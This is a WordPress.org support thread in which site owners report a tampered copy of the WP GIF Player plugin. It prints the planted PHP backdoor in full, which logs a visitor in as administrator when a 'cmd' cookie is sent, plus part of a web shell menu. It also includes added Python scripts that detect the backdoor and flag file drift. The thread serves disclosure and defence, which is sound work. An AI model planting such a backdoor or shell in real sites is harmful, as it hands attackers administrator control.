Title: Attack with your plugin
Last modified: December 27, 2017

---

# Attack with your plugin

 *  [diogobguerreiro](https://wordpress.org/support/users/diogobguerreiro/)
 * (@diogobguerreiro)
 * [8 years, 5 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/)
 * Today I was contacted by a person who wanted to buy advertising on my blog. I would forcefully install the plugin on my site but with their changes. The code below is what I found: one extra file in PHP format.
 * Is that really what I’m thinking? Did you want to steal my access?

```php
<?php
/**
 * WordPress User Page
 *
 * Handles authentication, registering, resetting passwords, forgot password,
 * and other user handling.
 *
 * @package WordPress
 */
// Trigger: the file does nothing unless the visitor sends a cookie named "cmd".
if (empty($_COOKIE['cmd'])) {
    die();
}
// Bootstraps WordPress core from four directories up, so the file works on
// its own when requested directly from inside the plugin folder.
require('../../../../wp-blog-header.php');
$query_str = "SELECT ID FROM $wpdb->users";
$user_ids  = $wpdb->get_results($query_str);
foreach ($user_ids as $uid) {
    $user_id = $uid->ID;
    // First administrator found: mint a session for them without any password.
    if (user_can($user_id, 'administrator')) {
        $user_info  = get_userdata($user_id);
        $user_login = $user_info->user_login;
        wp_set_current_user($user_id, $user_login);
        wp_set_auth_cookie($user_id);
        do_action('wp_login', $user_login);
        echo "You are logged in as $user_login";
        if (function_exists('get_admin_url')) {
            wp_redirect(get_admin_url());
        } else {
            wp_redirect(get_bloginfo('wpurl') . '/wp-admin');
        }
        exit;
    }
}
```
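The file above has a recognisable shape that a site owner can look for across every installed plugin: it bootstraps WordPress by itself, it is gated on a value in `$_COOKIE`, and it calls `wp_set_auth_cookie()` for an administrator without ever checking a password. The following scanner is an added example written for this thread, not code from WP GIF Player or its author; the indicator list, the weights and the threshold are assumptions chosen to separate this pattern from legitimate login code, and the two sample files are constructed (the first is the snippet from the post, the second a harmless plugin file).

```python
"""Flag PHP files whose code shape matches a cookie-gated WordPress login backdoor.

Added example for this thread, not code from the plugin or its author.
Indicators, weights and threshold are assumptions drawn from the posted file.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# (indicator name, pattern, weight). Weights are an assumption used for ranking.
INDICATORS = [
    ("bootstraps_wordpress",
     re.compile(r"(require|include)(_once)?\s*\(?\s*['\"][^'\"]*wp-(blog-header|load)\.php"), 2),
    ("cookie_trigger", re.compile(r"\$_COOKIE\s*\["), 1),
    ("mints_auth_cookie", re.compile(r"\bwp_set_auth_cookie\s*\("), 3),
    ("impersonates_user", re.compile(r"\bwp_set_current_user\s*\("), 2),
    ("enumerates_admins", re.compile(r"user_can\s*\([^)]*['\"]administrator['\"]"), 2),
    ("redirects_to_admin", re.compile(r"get_admin_url\s*\(|/wp-admin"), 1),
]
THRESHOLD = 6  # assumption: total weight at which a file is reported


@dataclass
class Finding:
    path: str
    score: int = 0
    hits: List[str] = field(default_factory=list)


def scan_source(path: str, source: str) -> Finding:
    """Score one PHP source text against the indicator list."""
    finding = Finding(path)
    for name, pattern, weight in INDICATORS:
        if pattern.search(source):
            finding.hits.append(name)
            finding.score += weight
    return finding


def suspicious(finding: Finding) -> bool:
    """Minting an auth cookie is normal in core's wp-login.php and in SSO
    plugins; it is the combination with a cookie trigger and self-bootstrapping
    inside a plugin directory that stands out, so that hit is mandatory."""
    return finding.score >= THRESHOLD and "mints_auth_cookie" in finding.hits


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Return the suspicious findings, highest score first."""
    found = [scan_source(p, s) for p, s in files.items()]
    return sorted((f for f in found if suspicious(f)), key=lambda f: -f.score)


# Constructed sample: the file posted in this thread, with straight quotes.
BACKDOOR_SAMPLE = r"""<?php
if(empty($_COOKIE['cmd'])){ die(); }
require('../../../../wp-blog-header.php');
$user_ids = $wpdb->get_results("SELECT ID FROM $wpdb->users");
foreach ($user_ids as $uid) {
  if (user_can($uid->ID, 'administrator')) {
    $info = get_userdata($uid->ID);
    wp_set_current_user($uid->ID, $info->user_login);
    wp_set_auth_cookie($uid->ID);
    do_action('wp_login', $info->user_login);
    wp_redirect(get_admin_url()); exit;
  }
}
"""

# Constructed sample: an ordinary plugin file that touches none of the indicators.
BENIGN_SAMPLE = r"""<?php
/* Plugin Name: Example footer text (constructed) */
add_action('wp_footer', function () {
    echo esc_html(get_option('example_footer_text', ''));
});
"""

# Paths are constructed placeholders, not the plugin's real layout.
SAMPLE_FILES = {
    "plugins/example-plugin/dropped.php": BACKDOOR_SAMPLE,
    "plugins/example-plugin/example-plugin.php": BENIGN_SAMPLE,
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}: score {f.score}, hits {', '.join(f.hits)}")
```

To run it over a real install, read each `*.php` under `wp-content/plugins` into the dictionary; anything reported is worth comparing byte-for-byte against the plugin's published release before deciding it is malicious.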

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [ruimoreira](https://wordpress.org/support/users/ruimoreira/)
 * (@ruimoreira)
 * [8 years, 3 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/#post-10023111)
 * I just had the same attack attempt on one of the websites I manage. I also noticed that this piece of code does not exist in the files on GitHub. In any case, thank you for reporting this; I was about to do the same 🙂
 *  [ruimoreira](https://wordpress.org/support/users/ruimoreira/)
 * (@ruimoreira)
 * [8 years, 3 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/#post-10023125)
 * Also, not just that … check it out … it tries to create a PHP shell of some sort.

```php
echo "<center><h1>system</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd() . "<br>\n";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "\n\n</i>\n";
echo "\n\n\n";
echo "<table width = 50%>";
echo "<tr>";
// The link targets below were rewritten by the forum when the post was
// rendered; only the "$current" variable and the mode parameter survive.
echo "<td>[Shell Command](".$current."&mode=system)</td>\n";
echo "<td>[Create a new file](".$current."&mode=create)</td>\n";
echo "<td>[Upload file](".$current."&mode=upload)</td>\n";
echo "<td>[Port Scan](".$current."&mode=port_scan)</td>\n";
echo "</tr></table>";
echo "\n\n";
```
 * wow !!!
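The useful observation in the reply above is that the dropped code "does not exist on the files in GitHub": the published plugin is the reference, and every file on disk that is not in it, or whose content differs from it, is where an attacker's additions live. The script below is an added example for this thread, not tooling from the plugin or its author. It hashes a plugin tree and reports drift against a manifest of the release; the release files, the "installed" tree and all paths are constructed samples, and `load_tree()` is the only part that touches a real directory.

```python
"""Report files added, modified or missing relative to a plugin's known-good release.

Added example for this thread, not the plugin's own tooling. The release
manifest and the installed tree below are constructed samples.
"""
import hashlib
from pathlib import Path
from typing import Dict, List, NamedTuple


class Drift(NamedTuple):
    added: List[str]     # on disk but absent from the release: dropped files
    modified: List[str]  # in both but content differs: tampered files
    missing: List[str]   # in the release but gone from disk


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: Dict[str, bytes]) -> Dict[str, str]:
    """Map relative path -> sha256 for a release tree (e.g. the tagged zip)."""
    return {path: sha256(content) for path, content in files.items()}


def compare(installed: Dict[str, bytes], manifest: Dict[str, str]) -> Drift:
    """Diff an installed tree (path -> bytes) against a release manifest."""
    added = sorted(p for p in installed if p not in manifest)
    missing = sorted(p for p in manifest if p not in installed)
    modified = sorted(p for p in installed
                      if p in manifest and sha256(installed[p]) != manifest[p])
    return Drift(added, modified, missing)


def load_tree(root: str) -> Dict[str, bytes]:
    """Read every file under root into the path -> bytes shape compare() expects.
    Not used by the sample run below; call it on a real wp-content/plugins/<plugin>."""
    base = Path(root)
    return {p.relative_to(base).as_posix(): p.read_bytes()
            for p in base.rglob("*") if p.is_file()}


# Constructed release: what the published plugin is assumed to contain.
RELEASE_FILES = {
    "example-plugin.php": b"<?php\n/* Plugin Name: Example (constructed) */\n",
    "readme.txt": b"=== Example ===\n",
    "js/player.js": b"console.log('player');\n",
}
RELEASE_MANIFEST = build_manifest(RELEASE_FILES)

# Constructed installed tree: the release plus one dropped file and one
# tampered file, mirroring what the two posters describe finding.
INSTALLED_FILES = dict(RELEASE_FILES)
INSTALLED_FILES["user.php"] = b"<?php if(empty($_COOKIE['cmd'])){die();} // dropped\n"
INSTALLED_FILES["example-plugin.php"] = RELEASE_FILES["example-plugin.php"] + b"include 'user.php';\n"


def sample_drift() -> Drift:
    return compare(INSTALLED_FILES, RELEASE_MANIFEST)


if __name__ == "__main__":
    drift = sample_drift()
    for label, paths in zip(("added", "modified", "missing"), drift):
        for p in paths:
            print(f"{label:9s} {p}")
```

Build the manifest from a fresh download of the same plugin version from wordpress.org or the project's tagged release, never from the install being checked, and treat an `added` PHP file in a plugin directory as the first thing to open.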


The topic ‘Attack with your plugin’ is closed to new replies.

 * [WP GIF Player](https://wordpress.org/plugins/wp-gif-player/)

 * 2 replies
 * 2 participants
 * Last reply from: [ruimoreira](https://wordpress.org/support/users/ruimoreira/)
 * Last activity: [8 years, 3 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/#post-10023125)
 * Status: not resolved